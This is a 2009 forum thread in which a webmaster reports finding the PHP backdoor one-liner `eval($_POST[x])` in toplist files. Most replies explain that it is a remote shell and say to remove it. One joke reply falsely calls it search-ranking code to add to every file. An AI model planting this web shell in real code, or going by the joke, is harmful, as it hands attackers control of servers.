Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums.

You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today!

If you have any problems with the registration process or your account login, please contact us.

Post New Thread Reply

Register GFY Rules Calendar
Go Back   GoFuckYourself.com - Adult Webmaster Forum > >
Discuss what's fucking going on, and which programs are best and worst. One-time "program" announcements from "established" webmasters are allowed.

 
Thread Tools
Old 02-25-2009, 11:01 AM   #1
zentz
Confirmed User
 
Industry Role:
Join Date: Nov 2003
Posts: 8,053
<? eval($_POST[x]); ?> is this a hack?

i found this in my toplist files

<? eval($_POST[x]); ?>

what is that? a hack?
__________________
Programs that owe me money ---- Epassporte.com ~ $2700 | Protraffic.com ~ $2600 | XonDemand.com ~ $3000

Email: [email protected]
zentz is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 02-25-2009, 11:06 AM   #2
seeandsee
Check SIG!
 
seeandsee's Avatar
 
Industry Role:
Join Date: Mar 2006
Location: Europe (Skype: gojkoas)
Posts: 50,945
bump for php wizards
__________________
BUY MY SIG - 50$/Year

Contact here
seeandsee is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 02-25-2009, 11:07 AM   #3
Angry Jew Cat - Banned for Life
(felis madjewicus)
 
Industry Role:
Join Date: Jul 2006
Location: In Mom & Dad's Basement
Posts: 20,368
hax teh planet
Angry Jew Cat - Banned for Life is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 02-25-2009, 11:10 AM   #4
ScriptWorkz
Confirmed User
 
Industry Role:
Join Date: Jul 2007
Location: Intraweb
Posts: 274
Most likely, it executes whatever code is in the post variable 'x' as php, so if someone posted some malicious php code it could be pretty bad depending on how your server is configured.

I don't really see any real point in having that in there and would most likely remove it unless you know it's used for something and even then i'd find a way to replace that functionality w/o something that didn't leave such a big security hole.
ScriptWorkz is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 02-25-2009, 11:33 AM   #5
Linguist
Confirmed User
 
Join Date: Apr 2004
Location: Toronto, ON
Posts: 1,706
That code CANNOT be used for anything good, period.

If your toplist stops working after removing that line, find another piece of software to replace it, no programmer with half a clue would include that code.
__________________
315-310
Linguist is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 02-25-2009, 11:41 AM   #6
HomerSimpson
Too lazy to set a custom title
 
HomerSimpson's Avatar
 
Industry Role:
Join Date: Sep 2005
Location: Springfield
Posts: 13,826
yes it is...
it can run any command attacker wants...
__________________
Make a bank with Chaturbate - the best selling webcam program
Ads that can't be block with AdBlockers !!! /// Best paying popup program (Bitcoin payouts) !!!

PHP, MySql, Smarty, CodeIgniter, Laravel, WordPress, NATS... fixing stuff, server migrations & optimizations... My ICQ: 27429884 | Email:
HomerSimpson is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 02-25-2009, 12:17 PM   #7
u-Bob
there's no $$$ in porn
 
u-Bob's Avatar
 
Industry Role:
Join Date: Jul 2005
Location: icq: 195./568.-230 (btw: not getting offline msgs)
Posts: 33,063
It's evil.
u-Bob is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 02-25-2009, 12:21 PM   #8
TeenCat
Too lazy to set a koala
 
TeenCat's Avatar
 
Industry Role:
Join Date: Jan 2007
Location: CZ/EU forever!
Posts: 16,139
"insert shell here"
__________________

6bot
/ Coming again very soon!
Svit Zlin Radio 24/7!
TeenCat is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 02-25-2009, 01:14 PM   #9
V_RocKs
Damn Right I Kiss Ass!
 
Industry Role:
Join Date: Dec 2003
Location: Cowtown, USA
Posts: 32,405
That is indeed "a hack"... Remote shell... Allows anyone to execute code as the user apache is running as. Usually "nobody".

What can it be used for?

select * from users;

among other things...
V_RocKs is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 02-25-2009, 01:40 PM   #10
Killswitch - BANNED FOR LIFE
Guest
 
Posts: n/a
heh, remove it, asap.
  Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 02-25-2009, 01:58 PM   #11
SmokeyTheBear
►SouthOfHeaven
 
SmokeyTheBear's Avatar
 
Join Date: Jun 2004
Location: PlanetEarth MyBoardRank: GerbilMaster My-Penis-Size: extralarge MyWeapon: Computer
Posts: 28,609
thats the secret google priority code, you should place it on the top of every file for better search engine ranking
__________________
hatisblack at yahoo.com
SmokeyTheBear is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Post New Thread Reply
Go Back   GoFuckYourself.com - Adult Webmaster Forum > >

Bookmarks



Advertising inquiries - marketing at gfy dot com

Contact Admin - Advertise - GFY Rules - Top

©2000-, AI Media Network Inc



Powered by vBulletin
Copyright © 2000- Jelsoft Enterprises Limited.